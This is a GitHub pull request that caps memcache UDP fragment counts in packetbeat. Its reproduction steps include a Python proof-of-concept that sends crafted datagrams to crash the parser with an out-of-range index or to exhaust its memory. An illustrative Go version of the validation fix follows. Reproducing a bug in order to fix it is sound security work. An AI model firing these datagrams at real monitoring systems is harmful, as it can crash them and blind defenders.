
@nicholasberlin (Contributor) commented Dec 2, 2025

Proposed commit message

packetbeat: verify and cap memcache udp fragment counts

Checklist

  • My code follows the style guidelines of this project
  • I have commented my code, particularly in hard-to-understand areas
  • I have made corresponding changes to the documentation
  • I have made corresponding change to the default configuration files
  • I have added tests that prove my fix is effective or that my feature works. Where relevant, I have used the stresstest.sh script to run them under stress conditions and race detector to verify their stability.
  • I have added an entry in ./changelog/fragments using the changelog tool.

How to test this PR locally

  1. Compile packetbeat
     cd /opt/beats
     go build -C packetbeat -o /usr/local/bin/packetbeat
  2. Run packetbeat
     packetbeat -e -c packetbeat_memcache_udp.yml
  3. Run the following script to trigger the issue:
#!/usr/bin/env python3
"""Send crafted memcache UDP datagrams to trigger Packetbeat bugs."""
import argparse
import socket
import struct
import time


def send_crash(sock, host, port):
    # Memcache UDP frame header: four big-endian uint16 fields.
    # requestID=0x4242, seqNumber=5, numDatagrams=2 -> out-of-bounds
    header = struct.pack(
        ">HHHH",
        0x4242,  # requestID
        5,       # seqNumber > numDatagrams
        2,       # numDatagrams
        0,       # reserved
    )
    sock.sendto(header + b"A", (host, port))


def send_spray(sock, host, port, count):
    # Every datagram claims to be fragment 0 of a 65535-fragment message,
    # the largest count the 16-bit field allows, so each one asks the
    # receiver to reserve a maximal fragment table.
    header = struct.pack(
        ">HHHH",
        0x5151,  # requestID
        0,       # seqNumber
        65535,   # numDatagrams (maximum representable)
        0,       # reserved
    )
    payload = b"B"
    for i in range(count):
        sock.sendto(header + payload, (host, port))
        time.sleep(0.05)

def main():
    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument("--host", default="127.0.0.1")
    parser.add_argument("--port", default=11211, type=int)
    parser.add_argument(
        "--mode",
        choices=["panic", "spray"],
        default="panic",
        help="panic sends OOB fragment index; spray exhausts heap",
    )
    parser.add_argument(
        "--spray-count",
        type=int,
        default=10,
        help="number of allocations to attempt in spray mode",
    )
    args = parser.parse_args()

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        if args.mode == "panic":
            send_crash(sock, args.host, args.port)
        else:
            send_spray(sock, args.host, args.port, args.spray_count)
    finally:
        sock.close()


if __name__ == "__main__":
    main()
python3 scripts/trigger_memcache_udp.py --mode panic
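
The checks the commit message describes, as an added example in Go (packetbeat's language) that is not the project's own code: it parses the 8-byte memcache UDP frame header (request ID, sequence number, number of datagrams, reserved; big-endian uint16 fields as defined in the memcached protocol), rejects a sequence number that is not below the datagram count (the datagram sent by the script's "panic" mode), and refuses a datagram count above a cap before any per-message table is allocated (the datagram sent by "spray" mode). The cap value of 32, the type and function names, and a reassembler keyed only by request ID are assumptions made for illustration; a real implementation would also key on the 5-tuple and expire stale entries.

```go
package main

import (
	"encoding/binary"
	"errors"
	"fmt"
)

// udpHeaderLen is the size of the memcache UDP frame header that precedes
// the text or binary protocol payload in every datagram.
const udpHeaderLen = 8

// maxFragments caps the number of datagrams a single message may claim.
// The value is an assumption for this example, not packetbeat's setting.
const maxFragments = 32

type udpHeader struct {
	RequestID    uint16
	SeqNumber    uint16
	NumDatagrams uint16
	Reserved     uint16
}

var (
	errShort            = errors.New("datagram shorter than memcache UDP header")
	errZeroCount        = errors.New("numDatagrams must be at least 1")
	errSeqOutOfRange    = errors.New("seqNumber not less than numDatagrams")
	errTooManyFragments = errors.New("numDatagrams exceeds configured cap")
	errCountChanged     = errors.New("numDatagrams changed within a message")
)

// parseUDPHeader decodes and validates the frame header. Every check runs
// before the caller allocates anything sized by the untrusted count.
func parseUDPHeader(b []byte) (udpHeader, error) {
	if len(b) < udpHeaderLen {
		return udpHeader{}, errShort
	}
	h := udpHeader{
		RequestID:    binary.BigEndian.Uint16(b[0:2]),
		SeqNumber:    binary.BigEndian.Uint16(b[2:4]),
		NumDatagrams: binary.BigEndian.Uint16(b[4:6]),
		Reserved:     binary.BigEndian.Uint16(b[6:8]),
	}
	if h.NumDatagrams == 0 {
		return h, errZeroCount
	}
	if h.SeqNumber >= h.NumDatagrams {
		return h, errSeqOutOfRange
	}
	if int(h.NumDatagrams) > maxFragments {
		return h, errTooManyFragments
	}
	return h, nil
}

// message holds the fragments of one request ID until all have arrived.
type message struct {
	fragments [][]byte
	received  int
}

// reassembler tracks in-flight messages by request ID (assumption: a real
// implementation keys on the 5-tuple as well and evicts stale entries).
type reassembler struct {
	pending map[uint16]*message
}

func newReassembler() *reassembler {
	return &reassembler{pending: make(map[uint16]*message)}
}

// add validates one datagram and returns the reassembled payload with
// done=true once every fragment of its message has been seen.
func (r *reassembler) add(dgram []byte) (payload []byte, done bool, err error) {
	h, err := parseUDPHeader(dgram)
	if err != nil {
		return nil, false, err
	}
	m, ok := r.pending[h.RequestID]
	if !ok {
		// The table is sized by NumDatagrams only after it passed the cap.
		m = &message{fragments: make([][]byte, h.NumDatagrams)}
		r.pending[h.RequestID] = m
	} else if len(m.fragments) != int(h.NumDatagrams) {
		// A later fragment must not be able to grow or shrink the table.
		return nil, false, errCountChanged
	}
	if m.fragments[h.SeqNumber] == nil {
		m.fragments[h.SeqNumber] = append([]byte(nil), dgram[udpHeaderLen:]...)
		m.received++
	}
	if m.received < len(m.fragments) {
		return nil, false, nil
	}
	delete(r.pending, h.RequestID)
	for _, f := range m.fragments {
		payload = append(payload, f...)
	}
	return payload, true, nil
}

// frame builds a datagram with the given header fields; it only exists to
// construct sample input for this example (reserved field left at zero).
func frame(reqID, seq, n uint16, body string) []byte {
	b := make([]byte, udpHeaderLen, udpHeaderLen+len(body))
	binary.BigEndian.PutUint16(b[0:2], reqID)
	binary.BigEndian.PutUint16(b[2:4], seq)
	binary.BigEndian.PutUint16(b[4:6], n)
	return append(b, body...)
}

func main() {
	r := newReassembler()
	// Same header fields as the trigger script's "panic" datagram.
	_, _, err := r.add(frame(0x4242, 5, 2, "A"))
	fmt.Println("panic datagram:", err)
	// Same header fields as the trigger script's "spray" datagram.
	_, _, err = r.add(frame(0x5151, 0, 65535, "B"))
	fmt.Println("spray datagram:", err)
	// A well-formed two-fragment message delivered out of order.
	r.add(frame(7, 1, 2, "y1\r\n"))
	msg, done, err := r.add(frame(7, 0, 2, "get ke"))
	fmt.Printf("reassembled: done=%v err=%v payload=%q\n", done, err, msg)
}
```

Both crafted datagrams are rejected by parseUDPHeader before the fragment table is created, so neither an out-of-range index nor a 65535-entry allocation is reachable; the well-formed message still reassembles in order regardless of arrival order.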

@nicholasberlin nicholasberlin requested a review from a team as a code owner December 2, 2025 21:27
@botelastic botelastic bot added the needs_team Indicates that the issue/PR needs a Team:* label label Dec 2, 2025
@github-actions bot (Contributor) commented Dec 2, 2025

🤖 GitHub comments

Just comment with:

  • run docs-build : Re-trigger the docs validation. (use unformatted text in the comment!)

@mergify bot (Contributor) commented Dec 2, 2025

This pull request does not have a backport label.
If this is a bug or security fix, could you label this PR @nicholasberlin? 🙏.
For such, you'll need to label your PR with:

  • The upcoming major version of the Elastic Stack
  • The upcoming minor version of the Elastic Stack (if you're not pushing a breaking change)

To fixup this pull request, you need to add the backport labels for the needed
branches, such as:

  • backport-8./d is the label to automatically backport to the 8./d branch. /d is the digit
  • backport-active-all is the label that automatically backports to all active branches.
  • backport-active-8 is the label that automatically backports to all active minor branches for the 8 major.
  • backport-active-9 is the label that automatically backports to all active minor branches for the 9 major.

@nicholasberlin nicholasberlin added the Team:Security-Linux Platform Linux Platform Team in Security Solution label Dec 2, 2025
@botelastic botelastic bot removed the needs_team Indicates that the issue/PR needs a Team:* label label Dec 2, 2025
@elasticmachine (Contributor)

Pinging @elastic/sec-linux-platform (Team:Security-Linux Platform)

@nicholasberlin nicholasberlin added backport-8.19 Automated backport to the 8.19 branch backport-9.1 Automated backport to the 9.1 branch backport-9.2 Automated backport to the 9.2 branch labels Dec 2, 2025
Labels

backport-8.19 Automated backport to the 8.19 branch backport-9.1 Automated backport to the 9.1 branch backport-9.2 Automated backport to the 9.2 branch bug Team:Security-Linux Platform Linux Platform Team in Security Solution